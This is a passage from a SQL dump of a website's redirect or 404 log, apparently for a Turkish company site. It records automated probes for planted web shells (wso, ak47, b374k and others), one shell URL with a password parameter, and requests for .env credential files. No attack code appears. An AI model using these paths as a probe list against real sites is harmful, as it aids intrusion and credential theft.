00:00:00',301),(36377,'https://3s-technologies.com.tr/en/wp-admin/js/widgets/wp-contact.php',NULL,'www.google.com','',1,0,'2024-09-08 06:43:14','0000-00-00 00:00:00',301),(36378,'http://3s-technologies.com.tr/en/wp/xxxxxxxxxxxxxxxxxxxxxxxxxxxx.php',NULL,'www.google.com','',1,0,'2024-09-08 06:43:28','0000-00-00 00:00:00',301),(36379,'https://3s-technologies.com.tr/en/wp/xxxxxxxxxxxxxxxxxxxxxxxxxxxx.php',NULL,'www.google.com','',1,0,'2024-09-08 06:43:33','0000-00-00 00:00:00',301),(36380,'http://3s-technologies.com.tr/en/wp-admin/includes/maint/wp-cron.php',NULL,'www.google.com','',1,0,'2024-09-08 06:43:38','0000-00-00 00:00:00',301),(36381,'https://3s-technologies.com.tr/en/wp-admin/includes/maint/wp-cron.php',NULL,'www.google.com','',1,0,'2024-09-08 06:43:43','0000-00-00 00:00:00',301),(36382,'https://3s-technologies.com.tr/en/wp-admin/includes/edit-tag-menu.php',NULL,'www.google.com','',1,0,'2024-09-08 06:43:53','0000-00-00 00:00:00',301),(36383,'https://3s-technologies.com.tr/en/wp-content/plugins/backup_index.php',NULL,'www.google.com','',1,0,'2024-09-08 06:44:03','0000-00-00 00:00:00',301),(36384,'http://3s-technologies.com.tr/en/wp-content/uploads/wp-blockdown.php',NULL,'www.google.com','',3,0,'2024-09-08 06:44:08','0000-00-00 00:00:00',301),(36385,'https://3s-technologies.com.tr/en/wp-content/uploads/wp-blockdown.php',NULL,'www.google.com','',1,0,'2024-09-08 06:44:12','0000-00-00 00:00:00',301),(36386,'http://3s-technologies.com.tr/en/wp-includes/images/wlw/shellwso.php',NULL,'www.google.com','',1,0,'2024-09-08 06:44:17','0000-00-00 00:00:00',301),(36387,'https://3s-technologies.com.tr/en/wp-includes/images/wlw/shellwso.php',NULL,'www.google.com','',1,0,'2024-09-08 06:44:22','0000-00-00 00:00:00',301),(36388,'http://3s-technologies.com.tr/en/wp-includes/images/media/local1.php',NULL,'www.google.com','',1,0,'2024-09-08 06:44:27','0000-00-00 00:00:00',301),(36389,'https://3s-technologies.com.tr/en/wp-includes/images/media/local1.php',NULL,'www.google.com','',1,0,'2024-09-08 06:44:32','0000-00-00 00:00:00',301),(36390,'http://3s-technologies.com.tr/en/wp-includes/class-wp-block-list.php',NULL,'www.google.com','',3,0,'2024-09-08 06:44:37','0000-00-00 00:00:00',301),(36391,'https://3s-technologies.com.tr/en/wp-includes/class-wp-block-list.php',NULL,'www.google.com','',1,0,'2024-09-08 06:44:42','0000-00-00 00:00:00',301),(36392,'http://3s-technologies.com.tr/en/wp-content/plugins/html404/wso25.php',NULL,'www.google.com','',3,0,'2024-09-08 06:45:09','0000-00-00 00:00:00',301),(36393,'https://3s-technologies.com.tr/en/wp-content/plugins/html404/wso25.php',NULL,'www.google.com','',1,0,'2024-09-08 06:45:14','0000-00-00 00:00:00',301),(36394,'http://3s-technologies.com.tr/en/wp-content/plugins/html404/xccc.php',NULL,'www.google.com','',3,0,'2024-09-08 06:45:19','0000-00-00 00:00:00',301),(36395,'https://3s-technologies.com.tr/en/wp-content/plugins/html404/xccc.php',NULL,'www.google.com','',1,0,'2024-09-08 06:45:23','0000-00-00 00:00:00',301),(36396,'http://3s-technologies.com.tr/en/wp-includes/images/wlw/wp-signup.php',NULL,'www.google.com','',1,0,'2024-09-08 06:45:28','0000-00-00 00:00:00',301),(36397,'https://3s-technologies.com.tr/en/wp-includes/images/wlw/wp-signup.php',NULL,'www.google.com','',1,0,'2024-09-08 06:45:33','0000-00-00 00:00:00',301),(36398,'http://3s-technologies.com.tr/en/wp-includes/images/media/xwsoooo.php',NULL,'www.google.com','',1,0,'2024-09-08 06:45:38','0000-00-00 00:00:00',301),(36399,'https://3s-technologies.com.tr/en/wp-includes/images/media/xwsoooo.php',NULL,'www.google.com','',1,0,'2024-09-08 06:45:43','0000-00-00 00:00:00',301),(36400,'http://3s-technologies.com.tr/en/blog/xxxxxxxxxxxxxxxxxxxxxxxxxxxx.php',NULL,'www.google.com','',1,0,'2024-09-08 06:45:48','0000-00-00 00:00:00',301),(36401,'https://3s-technologies.com.tr/en/blog/xxxxxxxxxxxxxxxxxxxxxxxxxxxx.php',NULL,'www.google.com','',1,0,'2024-09-08 06:45:52','0000-00-00 00:00:00',301),(36402,'http://3s-technologies.com.tr/en/wp-includes/pomo/wp_class_datalib.php',NULL,'www.google.com','',3,0,'2024-09-08 06:45:57','0000-00-00 00:00:00',301),(36403,'https://3s-technologies.com.tr/en/wp-includes/pomo/wp_class_datalib.php',NULL,'www.google.com','',1,0,'2024-09-08 06:46:02','0000-00-00 00:00:00',301),(36404,'https://3s-technologies.com.tr/en/wp-content/plugins/css-ready/file.php',NULL,'www.google.com','',1,0,'2024-09-08 06:46:12','0000-00-00 00:00:00',301),(36405,'http://3s-technologies.com.tr/en/wp-includes/images/media/shellwso.php',NULL,'www.google.com','',1,0,'2024-09-08 06:46:17','0000-00-00 00:00:00',301),(36406,'https://3s-technologies.com.tr/en/wp-includes/images/media/shellwso.php',NULL,'www.google.com','',1,0,'2024-09-08 06:46:21','0000-00-00 00:00:00',301),(36407,'http://3s-technologies.com.tr/en/wp/wp-content/themes/seotheme/mar.php',NULL,'www.google.com','',1,0,'2024-09-08 06:46:37','0000-00-00 00:00:00',301),(36408,'https://3s-technologies.com.tr/en/wp/wp-content/themes/seotheme/mar.php',NULL,'www.google.com','',1,0,'2024-09-08 06:46:42','0000-00-00 00:00:00',301),(36409,'http://3s-technologies.com.tr/en/wp-admin/includes/maint/repair-bak.php',NULL,'www.google.com','',1,0,'2024-09-08 06:46:47','0000-00-00 00:00:00',301),(36410,'https://3s-technologies.com.tr/en/wp-admin/includes/maint/repair-bak.php',NULL,'www.google.com','',1,0,'2024-09-08 06:46:51','0000-00-00 00:00:00',301),(36411,'https://3s-technologies.com.tr/en/wp-content/mu-plugins/db-safe-mode.php',NULL,'www.google.com','',1,0,'2024-09-08 06:47:01','0000-00-00 00:00:00',301),(36412,'http://3s-technologies.com.tr/en/wp-includes/images/media/wp-conflg.php',NULL,'www.google.com','',1,0,'2024-09-08 06:47:21','0000-00-00 00:00:00',301),(36413,'https://3s-technologies.com.tr/en/wp-includes/images/media/wp-conflg.php',NULL,'www.google.com','',1,0,'2024-09-08 06:47:26','0000-00-00 00:00:00',301),(36414,'http://3s-technologies.com.tr/en/wp-admin/css/colors/ocean/template.php',NULL,'www.google.com','',1,0,'2024-09-08 06:47:31','0000-00-00 00:00:00',301),(36415,'https://3s-technologies.com.tr/en/wp-admin/css/colors/ocean/template.php',NULL,'www.google.com','',1,0,'2024-09-08 06:47:36','0000-00-00 00:00:00',301),(36416,'http://3s-technologies.com.tr/en/images/xxxxxxxxxxxxxxxxxxxxxxxxxxxx.php',NULL,'www.google.com','',1,0,'2024-09-08 06:47:41','0000-00-00 00:00:00',301),(36417,'https://3s-technologies.com.tr/en/images/xxxxxxxxxxxxxxxxxxxxxxxxxxxx.php',NULL,'www.google.com','',1,0,'2024-09-08 06:47:46','0000-00-00 00:00:00',301),(36418,'http://3s-technologies.com.tr/en/blog/wp-content/themes/seotheme/mar.php',NULL,'www.google.com','',1,0,'2024-09-08 06:47:51','0000-00-00 00:00:00',301),(36419,'https://3s-technologies.com.tr/en/blog/wp-content/themes/seotheme/mar.php',NULL,'www.google.com','',1,0,'2024-09-08 06:47:56','0000-00-00 00:00:00',301),(36420,'http://3s-technologies.com.tr/en/site/wp-content/themes/seotheme/mar.php',NULL,'www.google.com','',1,0,'2024-09-08 06:48:01','0000-00-00 00:00:00',301),(36421,'https://3s-technologies.com.tr/en/site/wp-content/themes/seotheme/mar.php',NULL,'www.google.com','',1,0,'2024-09-08 06:48:06','0000-00-00 00:00:00',301),(36422,'http://3s-technologies.com.tr/en/test/wp-content/themes/seotheme/mar.php',NULL,'www.google.com','',1,0,'2024-09-08 06:48:11','0000-00-00 00:00:00',301),(36423,'https://3s-technologies.com.tr/en/test/wp-content/themes/seotheme/mar.php',NULL,'www.google.com','',1,0,'2024-09-08 06:48:16','0000-00-00 00:00:00',301),(36424,'http://3s-technologies.com.tr/en/uploads/xxxxxxxxxxxxxxxxxxxxxxxxxxxx.php',NULL,'www.google.com','',1,0,'2024-09-08 06:48:21','0000-00-00 00:00:00',301),(36425,'https://3s-technologies.com.tr/en/uploads/xxxxxxxxxxxxxxxxxxxxxxxxxxxx.php',NULL,'www.google.com','',1,0,'2024-09-08 06:48:26','0000-00-00 00:00:00',301),(36426,'http://3s-technologies.com.tr/en/modules/xxxxxxxxxxxxxxxxxxxxxxxxxxxx.php',NULL,'www.google.com','',1,0,'2024-09-08 06:48:30','0000-00-00 00:00:00',301),(36427,'https://3s-technologies.com.tr/en/modules/xxxxxxxxxxxxxxxxxxxxxxxxxxxx.php',NULL,'www.google.com','',1,0,'2024-09-08 06:48:35','0000-00-00 00:00:00',301),(36428,'http://3s-technologies.com.tr/en/demo328/xxxxxxxxxxxxxxxxxxxxxxxxxxxx.php',NULL,'www.google.com','',1,0,'2024-09-08 06:48:39','0000-00-00 00:00:00',301),(36429,'https://3s-technologies.com.tr/en/demo328/xxxxxxxxxxxxxxxxxxxxxxxxxxxx.php',NULL,'www.google.com','',1,0,'2024-09-08 06:48:44','0000-00-00 00:00:00',301),(36430,'http://3s-technologies.com.tr/en/wp-admin/includes/maint/wp-readindex.php',NULL,'www.google.com','',1,0,'2024-09-08 06:48:48','0000-00-00 00:00:00',301),(36431,'https://3s-technologies.com.tr/en/wp-admin/includes/maint/wp-readindex.php',NULL,'www.google.com','',1,0,'2024-09-08 06:48:53','0000-00-00 00:00:00',301),(36432,'http://3s-technologies.com.tr/en/wp-content/plugins/html404/cry.php.pjpeg',NULL,'www.google.com','',3,0,'2024-09-08 06:49:11','0000-00-00 00:00:00',301),(36433,'https://3s-technologies.com.tr/en/wp-content/plugins/html404/cry.php.pjpeg',NULL,'www.google.com','',1,0,'2024-09-08 06:49:15','0000-00-00 00:00:00',301),(36434,'http://3s-technologies.com.tr/en/wp-content/plugins/widget-logic/mini.php',NULL,'www.google.com','',3,0,'2024-09-08 06:49:19','0000-00-00 00:00:00',301),(36435,'https://3s-technologies.com.tr/en/wp-content/plugins/widget-logic/mini.php',NULL,'www.google.com','',1,0,'2024-09-08 06:49:23','0000-00-00 00:00:00',301),(36436,'http://3s-technologies.com.tr/en/wp-content/mu-plugins-old/iimzloqncz.php',NULL,'www.google.com','',1,0,'2024-09-08 06:49:27','0000-00-00 00:00:00',301),(36437,'https://3s-technologies.com.tr/en/wp-content/mu-plugins-old/iimzloqncz.php',NULL,'www.google.com','',1,0,'2024-09-08 06:49:33','0000-00-00 00:00:00',301),(36438,'http://3s-technologies.com.tr/en/wp-admin/xxxxxxxxxxxxxxxxxxxxxxxxxxxx.php',NULL,'www.google.com','',1,0,'2024-09-08 06:49:38','0000-00-00 00:00:00',301),(36439,'https://3s-technologies.com.tr/en/wp-admin/xxxxxxxxxxxxxxxxxxxxxxxxxxxx.php',NULL,'www.google.com','',1,0,'2024-09-08 06:49:42','0000-00-00 00:00:00',301),(36440,'http://3s-technologies.com.tr/en/wp-content/plugins/css-ready-sel/file.php',NULL,'www.google.com','',4,0,'2024-09-08 06:49:47','0000-00-00 00:00:00',301),(36441,'https://3s-technologies.com.tr/en/wp-content/plugins/css-ready-sel/file.php',NULL,'www.google.com','',1,0,'2024-09-08 06:49:51','0000-00-00 00:00:00',301),(36442,'http://3s-technologies.com.tr/en/wp-includes/id3/module.tag.id3v1-cron.php',NULL,'www.google.com','',1,0,'2024-09-08 06:49:56','0000-00-00 00:00:00',301),(36443,'https://3s-technologies.com.tr/en/wp-includes/id3/module.tag.id3v1-cron.php',NULL,'www.google.com','',1,0,'2024-09-08 06:50:01','0000-00-00 00:00:00',301),(36444,'http://3s-technologies.com.tr/en/wp-includes/pomo/class-wp-sitemap-mna.php',NULL,'www.google.com','',1,0,'2024-09-08 06:50:06','0000-00-00 00:00:00',301),(36445,'https://3s-technologies.com.tr/en/wp-includes/pomo/class-wp-sitemap-mna.php',NULL,'www.google.com','',1,0,'2024-09-08 06:50:11','0000-00-00 00:00:00',301),(36446,'http://3s-technologies.com.tr/en/wp-contentxxxxxxxxxxxxxxxxxxxxxxxxxxxx.php',NULL,'www.google.com','',1,0,'2024-09-08 06:50:15','0000-00-00 00:00:00',301),(36447,'https://3s-technologies.com.tr/en/wp-contentxxxxxxxxxxxxxxxxxxxxxxxxxxxx.php',NULL,'www.google.com','',1,0,'2024-09-08 06:50:20','0000-00-00 00:00:00',301),(36448,'http://3s-technologies.com.tr/en/templates/xxxxxxxxxxxxxxxxxxxxxxxxxxxx.php',NULL,'www.google.com','',1,0,'2024-09-08 06:50:25','0000-00-00 00:00:00',301),(36449,'https://3s-technologies.com.tr/en/templates/xxxxxxxxxxxxxxxxxxxxxxxxxxxx.php',NULL,'www.google.com','',1,0,'2024-09-08 06:50:30','0000-00-00 00:00:00',301),(36450,'http://3s-technologies.com.tr/en/libraries/xxxxxxxxxxxxxxxxxxxxxxxxxxxx.php',NULL,'www.google.com','',1,0,'2024-09-08 06:50:35','0000-00-00 00:00:00',301),(36451,'https://3s-technologies.com.tr/en/libraries/xxxxxxxxxxxxxxxxxxxxxxxxxxxx.php',NULL,'www.google.com','',1,0,'2024-09-08 06:50:40','0000-00-00 00:00:00',301),(36452,'http://3s-technologies.com.tr/en/wp-content/xxxxxxxxxxxxxxxxxxxxxxxxxxxx.php',NULL,'www.google.com','',1,0,'2024-09-08 06:50:45','0000-00-00 00:00:00',301),(36453,'https://3s-technologies.com.tr/en/wp-content/xxxxxxxxxxxxxxxxxxxxxxxxxxxx.php',NULL,'www.google.com','',1,0,'2024-09-08 06:50:50','0000-00-00 00:00:00',301),(36454,'http://3s-technologies.com.tr/en/components/xxxxxxxxxxxxxxxxxxxxxxxxxxxx.php',NULL,'www.google.com','',1,0,'2024-09-08 06:50:55','0000-00-00 00:00:00',301),(36455,'https://3s-technologies.com.tr/en/components/xxxxxxxxxxxxxxxxxxxxxxxxxxxx.php',NULL,'www.google.com','',1,0,'2024-09-08 06:51:00','0000-00-00 00:00:00',301),(36456,'http://3s-technologies.com.tr/en/wp-content/plugins/vwcleanerplugin/bump.php',NULL,'www.google.com','',6,0,'2024-09-08 06:51:12','0000-00-00 00:00:00',301),(36457,'https://3s-technologies.com.tr/en/wp-content/plugins/vwcleanerplugin/bump.php',NULL,'www.google.com','',1,0,'2024-09-08 06:51:17','0000-00-00 00:00:00',301),(36458,'http://3s-technologies.com.tr/en/wp-includes/xxxxxxxxxxxxxxxxxxxxxxxxxxxx.php',NULL,'www.google.com','',1,0,'2024-09-08 06:51:22','0000-00-00 00:00:00',301),(36459,'https://3s-technologies.com.tr/en/wp-includes/xxxxxxxxxxxxxxxxxxxxxxxxxxxx.php',NULL,'www.google.com','',1,0,'2024-09-08 06:51:27','0000-00-00 00:00:00',301),(36460,'http://3s-technologies.com.tr/en/wp-admin/js/xxxxxxxxxxxxxxxxxxxxxxxxxxxx.php',NULL,'www.google.com','',1,0,'2024-09-08 06:51:32','0000-00-00 00:00:00',301),(36461,'https://3s-technologies.com.tr/en/wp-admin/js/xxxxxxxxxxxxxxxxxxxxxxxxxxxx.php',NULL,'www.google.com','',1,0,'2024-09-08 06:51:37','0000-00-00 00:00:00',301),(36462,'http://3s-technologies.com.tr/en/.well-known/xxxxxxxxxxxxxxxxxxxxxxxxxxxx.php',NULL,'www.google.com','',1,0,'2024-09-08 06:51:41','0000-00-00 00:00:00',301),(36463,'https://3s-technologies.com.tr/en/.well-known/xxxxxxxxxxxxxxxxxxxxxxxxxxxx.php',NULL,'www.google.com','',1,0,'2024-09-08 06:51:46','0000-00-00 00:00:00',301),(36464,'http://3s-technologies.com.tr/en/wp-admin/includes/tablepress_controllers.php',NULL,'www.google.com','',1,0,'2024-09-08 06:51:50','0000-00-00 00:00:00',301),(36465,'https://3s-technologies.com.tr/en/wp-admin/includes/tablepress_controllers.php',NULL,'www.google.com','',1,0,'2024-09-08 06:51:55','0000-00-00 00:00:00',301),(36466,'http://3s-technologies.com.tr/en/wp-includes/widgets/class-wp-widget-tags.php',NULL,'www.google.com','',1,0,'2024-09-08 06:52:00','0000-00-00 00:00:00',301),(36467,'https://3s-technologies.com.tr/en/wp-includes/widgets/class-wp-widget-tags.php',NULL,'www.google.com','',1,0,'2024-09-08 06:52:04','0000-00-00 00:00:00',301),(36468,'http://3s-technologies.com.tr/en/wordpress/wp-content/themes/seotheme/mar.php',NULL,'www.google.com','',1,0,'2024-09-08 06:52:09','0000-00-00 00:00:00',301),(36469,'https://3s-technologies.com.tr/en/wordpress/wp-content/themes/seotheme/mar.php',NULL,'www.google.com','',1,0,'2024-09-08 06:52:14','0000-00-00 00:00:00',301),(36470,'http://3s-technologies.com.tr/en/administrator/xxxxxxxxxxxxxxxxxxxxxxxxxxxx.php',NULL,'www.google.com','',1,0,'2024-09-08 06:52:19','0000-00-00 00:00:00',301),(36471,'https://3s-technologies.com.tr/en/administrator/xxxxxxxxxxxxxxxxxxxxxxxxxxxx.php',NULL,'www.google.com','',1,0,'2024-09-08 06:52:23','0000-00-00 00:00:00',301),(36472,'https://3s-technologies.com.tr/en/wp-admin/includes/class-wp-media-list-data.php',NULL,'www.google.com','',1,0,'2024-09-08 06:52:33','0000-00-00 00:00:00',301),(36473,'http://3s-technologies.com.tr/en/wp-content/plugins/theme-configurator/mini.php',NULL,'www.google.com','',3,0,'2024-09-08 06:52:38','0000-00-00 00:00:00',301),(36474,'https://3s-technologies.com.tr/en/wp-content/plugins/theme-configurator/mini.php',NULL,'www.google.com','',1,0,'2024-09-08 06:52:42','0000-00-00 00:00:00',301),(36475,'https://3s-technologies.com.tr/en/wp-content/plugins/wp-db-ajax-made/wp-ajax.php',NULL,'www.google.com','',1,0,'2024-09-08 06:52:51','0000-00-00 00:00:00',301),(36476,'https://3s-technologies.com.tr/en/modules/mod_simplefileuploadv1.3/elements/udd.php',NULL,'www.google.com','',1,0,'2024-09-08 06:53:01','0000-00-00 00:00:00',301),(36477,'http://3s-technologies.com.tr/en/wp-includes/class-wp-block-type-ajax-response.php',NULL,'www.google.com','',1,0,'2024-09-08 06:53:05','0000-00-00 00:00:00',301),(36478,'https://3s-technologies.com.tr/en/wp-includes/class-wp-block-type-ajax-response.php',NULL,'www.google.com','',1,0,'2024-09-08 06:53:11','0000-00-00 00:00:00',301),(36479,'http://3s-technologies.com.tr/en/wp-admin/includes/xxxxxxxxxxxxxxxxxxxxxxxxxxxx.php',NULL,'www.google.com','',1,0,'2024-09-08 06:53:15','0000-00-00 00:00:00',301),(36480,'https://3s-technologies.com.tr/en/wp-admin/includes/xxxxxxxxxxxxxxxxxxxxxxxxxxxx.php',NULL,'www.google.com','',1,0,'2024-09-08 06:53:20','0000-00-00 00:00:00',301),(36481,'http://3s-technologies.com.tr/en/wp-admin/includes/class-wp-pagebuilders-9llwkf.php',NULL,'www.google.com','',1,0,'2024-09-08 06:53:24','0000-00-00 00:00:00',301),(36482,'https://3s-technologies.com.tr/en/wp-admin/includes/class-wp-pagebuilders-9llwkf.php',NULL,'www.google.com','',1,0,'2024-09-08 06:53:29','0000-00-00 00:00:00',301),(36483,'http://3s-technologies.com.tr/en/wp-admin/includes/class-wp-pagebuilders-2mylvx.php',NULL,'www.google.com','',1,0,'2024-09-08 06:53:34','0000-00-00 00:00:00',301),(36484,'https://3s-technologies.com.tr/en/wp-admin/includes/class-wp-pagebuilders-2mylvx.php',NULL,'www.google.com','',1,0,'2024-09-08 06:53:39','0000-00-00 00:00:00',301),(36485,'https://3s-technologies.com.tr/en/wp-content/plugins/ioptimization/ioptimize.php?rchk',NULL,'www.google.com','',3,0,'2024-09-08 06:53:48','0000-00-00 00:00:00',301),(36486,'https://3s-technologies.com.tr/en/wp-content/plugins/three-column-screen-layout/db.php',NULL,'www.google.com','',1,0,'2024-09-08 06:53:57','0000-00-00 00:00:00',301),(36487,'https://3s-technologies.com.tr/en/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282',NULL,'www.google.com','',1,0,'2024-09-08 06:54:07','0000-00-00 00:00:00',301),(36488,'http://3s-technologies.com.tr/en/wp-includes/customize/class-wp-customize-nav-menu.php?new',NULL,'www.google.com','',1,0,'2024-09-08 06:54:12','0000-00-00 00:00:00',301),(36489,'https://3s-technologies.com.tr/en/wp-includes/customize/class-wp-customize-nav-menu.php?new',NULL,'www.google.com','',1,0,'2024-09-08 06:54:16','0000-00-00 00:00:00',301),(36490,'https://3s-technologies.com.tr/tr/wp-json/wp/v2/posts?_fields=content,title,link,date_gmt,modified_gmt&search=href&search_columns=post_content&per_page=100&page=1',NULL,'https://www.google.com/','',2,0,'2024-09-08 19:33:59','0000-00-00 00:00:00',301),(36491,'http://www.3s-technologies.com.tr/tr/upload/d/txt/test.txt',NULL,'http://www.3s-technologies.com.tr/upload/d/txt/test.txt','',1,0,'2024-09-09 14:44:52','0000-00-00 00:00:00',301),(36492,'https://3s-technologies.com.tr/tr/wp-json/litespeed/v1/ping',NULL,'','',1,0,'2024-09-11 03:49:35','0000-00-00 00:00:00',301),(36493,'https://3s-technologies.com.tr/tr/wp-content/plugins/litespeed-cache/css/litespeed.css',NULL,'','',1,0,'2024-09-11 03:49:35','0000-00-00 00:00:00',301),(36494,'https://3s-technologies.com.tr/tr/wp-content/plugins/litespeed-cache/assets/css/litespeed-legacy.css',NULL,'','',1,0,'2024-09-11 03:49:35','0000-00-00 00:00:00',301),(36495,'https://3s-technologies.com.tr/tr/wp-content/plugins/litespeed-cache/changelog.txt',NULL,'','',1,0,'2024-09-11 03:49:35','0000-00-00 00:00:00',301),(36496,'https://3s-technologies.com.tr/tr/wp-content/plugins/litespeed-cache/readme.txt',NULL,'','',1,0,'2024-09-11 03:49:35','0000-00-00 00:00:00',301),(36497,'http://www.3s-technologies.com.tr/tr/wp-includes/id3/index.php',NULL,'','',7,0,'2024-09-11 08:20:28','0000-00-00 00:00:00',301),(36498,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/index.php',NULL,'','',14,0,'2024-09-11 08:20:32','0000-00-00 00:00:00',301),(36499,'http://www.3s-technologies.com.tr/tr/wp-admin/network/index.php',NULL,'','',3,0,'2024-09-11 08:20:35','0000-00-00 00:00:00',301),(36500,'http://www.3s-technologies.com.tr/tr/wp-includes/ixr/index.php',NULL,'','',1,0,'2024-09-11 08:20:38','0000-00-00 00:00:00',301),(36501,'http://www.3s-technologies.com.tr/tr/wp-admin/images/index.php',NULL,'','',5,0,'2024-09-11 08:20:41','0000-00-00 00:00:00',301),(36502,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/admin.php',NULL,'','',7,0,'2024-09-11 08:20:48','0000-00-00 00:00:00',301),(36503,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/core-econ/uph.php',NULL,'','',2,0,'2024-09-11 08:20:54','0000-00-00 00:00:00',301),(36504,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/fix/up.php',NULL,'','',1,0,'2024-09-11 08:20:56','0000-00-00 00:00:00',301),(36505,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/pwnd/pwnd.php',NULL,'','',2,0,'2024-09-11 08:21:00','0000-00-00 00:00:00',301),(36506,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/shell/noimg.php',NULL,'','',1,0,'2024-09-11 08:21:02','0000-00-00 00:00:00',301),(36507,'http://www.3s-technologies.com.tr/tr/wsoenigma.php',NULL,'','',1,0,'2024-09-11 08:21:05','0000-00-00 00:00:00',301),(36508,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/pwnd-1/pwnd.php',NULL,'','',1,0,'2024-09-11 08:21:08','0000-00-00 00:00:00',301),(36509,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/dummyyummy/wp-signup.php',NULL,'','',2,0,'2024-09-11 08:21:10','0000-00-00 00:00:00',301),(36510,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/clara/clara.php',NULL,'','',1,0,'2024-09-11 08:21:13','0000-00-00 00:00:00',301),(36511,'https://3s-technologies.com.tr/geju.php',NULL,'','',1,0,'2024-09-12 12:56:34','0000-00-00 00:00:00',301),(36512,'https://3s-technologies.com.tr/tr/start.html',NULL,'https://3s-technologies.com.tr/tr/start.html','',1,0,'2024-09-12 15:51:09','0000-00-00 00:00:00',301),(36513,'https://3s-technologies.com.tr/tr/wp-includes/js/quicktags.js',NULL,'','',4,0,'2024-09-13 07:25:49','0000-00-00 00:00:00',301),(36514,'http://3s-technologies.com.tr/tr/wp-includes/js/quicktags.js',NULL,'','',3,0,'2024-09-13 07:25:50','0000-00-00 00:00:00',301),(36515,'http://www.3s-technologies.com.tr/tr/images/ddm/le40v.png&quot',NULL,'','',1,0,'2024-09-13 18:57:57','0000-00-00 00:00:00',301),(36516,'https://www.3s-technologies.com.tr/en/sites/favicon.ico',NULL,'','',1,0,'2024-09-14 16:00:30','0000-00-00 00:00:00',301),(36517,'https://www.3s-technologies.com.tr/en/sites/favicon.png',NULL,'','',1,0,'2024-09-14 16:00:33','0000-00-00 00:00:00',301),(36518,'https://3s-technologies.com.tr/en/app',NULL,'https://3s-technologies.com.tr/app/','',325,0,'2024-09-15 10:16:10','0000-00-00 00:00:00',301),(36519,'http://3s-technologies.com.tr/tr/2023',NULL,'http://3s-technologies.com.tr/2023','',16,0,'2024-09-15 17:36:18','0000-00-00 00:00:00',301),(36520,'http://3s-technologies.com.tr/tr/2024',NULL,'http://3s-technologies.com.tr/2024','',16,0,'2024-09-15 17:40:17','0000-00-00 00:00:00',301),(36521,'http://3s-technologies.com.tr/tr/2017',NULL,'http://3s-technologies.com.tr/2017','',8,0,'2024-09-15 17:42:58','0000-00-00 00:00:00',301),(36522,'https://3s-technologies.com.tr/tr/cgi-bin/.env',NULL,'','',1,0,'2024-09-16 01:45:26','0000-00-00 00:00:00',301),(36523,'http://mail.3s-technologies.com.tr/en/simple.php',NULL,'www.google.com','',2,0,'2024-09-16 15:48:12','0000-00-00 00:00:00',301),(36524,'https://mail.3s-technologies.com.tr/en/wp-content/plugins/yyobang/mar.php',NULL,'www.google.com','',2,0,'2024-09-16 15:49:30','0000-00-00 00:00:00',301),(36525,'http://mail.3s-technologies.com.tr/en/wp-content/plugins/press/wp-class.php',NULL,'www.google.com','',2,0,'2024-09-16 15:50:18','0000-00-00 00:00:00',301),(36526,'https://mail.3s-technologies.com.tr/en/xxl.php',NULL,'www.google.com','',2,0,'2024-09-16 15:51:09','0000-00-00 00:00:00',301),(36527,'http://mail.3s-technologies.com.tr/en/fm1.php',NULL,'www.google.com','',2,0,'2024-09-16 15:51:55','0000-00-00 00:00:00',301),(36528,'http://3s-technologies.com.tr/tr/sendgrid.env',NULL,'http://3s-technologies.com.tr/sendgrid.env','',6,0,'2024-09-16 18:49:25','0000-00-00 00:00:00',301),(36529,'http://3s-technologies.com.tr/en/ak47shell.php',NULL,'www.google.com','',5,0,'2024-09-17 03:29:15','0000-00-00 00:00:00',301),(36530,'https://3s-technologies.com.tr/en/ak47shell.php',NULL,'www.google.com','',3,0,'2024-09-17 03:29:37','0000-00-00 00:00:00',301),(36531,'http://3s-technologies.com.tr/en/ak47.php',NULL,'www.google.com','',3,0,'2024-09-17 03:29:59','0000-00-00 00:00:00',301),(36532,'https://3s-technologies.com.tr/en/ak47.php',NULL,'www.google.com','',3,0,'2024-09-17 03:30:25','0000-00-00 00:00:00',301),(36533,'http://3s-technologies.com.tr/en/b374kpriv8.php',NULL,'www.google.com','',3,0,'2024-09-17 03:31:34','0000-00-00 00:00:00',301),(36534,'https://3s-technologies.com.tr/en/b374kpriv8.php',NULL,'www.google.com','',3,0,'2024-09-17 03:31:55','0000-00-00 00:00:00',301),(36535,'http://3s-technologies.com.tr/en/b1ng0.php',NULL,'www.google.com','',3,0,'2024-09-17 03:32:17','0000-00-00 00:00:00',301),(36536,'https://3s-technologies.com.tr/en/b1ng0.php',NULL,'www.google.com','',3,0,'2024-09-17 03:32:39','0000-00-00 00:00:00',301),(36537,'https://3s-technologies.com.tr/en/zero.php',NULL,'www.google.com','',3,0,'2024-09-17 03:33:27','0000-00-00 00:00:00',301),(36538,'http://3s-technologies.com.tr/en/yanz.php',NULL,'www.google.com','',8,0,'2024-09-17 03:33:50','0000-00-00 00:00:00',301),(36539,'https://3s-technologies.com.tr/en/yanz.php',NULL,'www.google.com','',3,0,'2024-09-17 03:34:14','0000-00-00 00:00:00',301),(36540,'http://3s-technologies.com.tr/en/x0mb13.php',NULL,'www.google.com','',3,0,'2024-09-17 03:34:39','0000-00-00 00:00:00',301),(36541,'https://3s-technologies.com.tr/en/x0mb13.php',NULL,'www.google.com','',3,0,'2024-09-17 03:35:03','0000-00-00 00:00:00',301),(36542,'http://3s-technologies.com.tr/en/ultra.php',NULL,'www.google.com','',3,0,'2024-09-17 03:35:27','0000-00-00 00:00:00',301),(36543,'https://3s-technologies.com.tr/en/ultra.php',NULL,'www.google.com','',3,0,'2024-09-17 03:35:51','0000-00-00 00:00:00',301),(36544,'http://3s-technologies.com.tr/en/tinny.php',NULL,'www.google.com','',3,0,'2024-09-17 03:36:14','0000-00-00 00:00:00',301),(36545,'https://3s-technologies.com.tr/en/tinny.php',NULL,'www.google.com','',3,0,'2024-09-17 03:36:38','0000-00-00 00:00:00',301),(36546,'http://3s-technologies.com.tr/en/rc.php',NULL,'www.google.com','',3,0,'2024-09-17 03:37:01','0000-00-00 00:00:00',301),(36547,'https://3s-technologies.com.tr/en/rc.php',NULL,'www.google.com','',3,0,'2024-09-17 03:37:24','0000-00-00 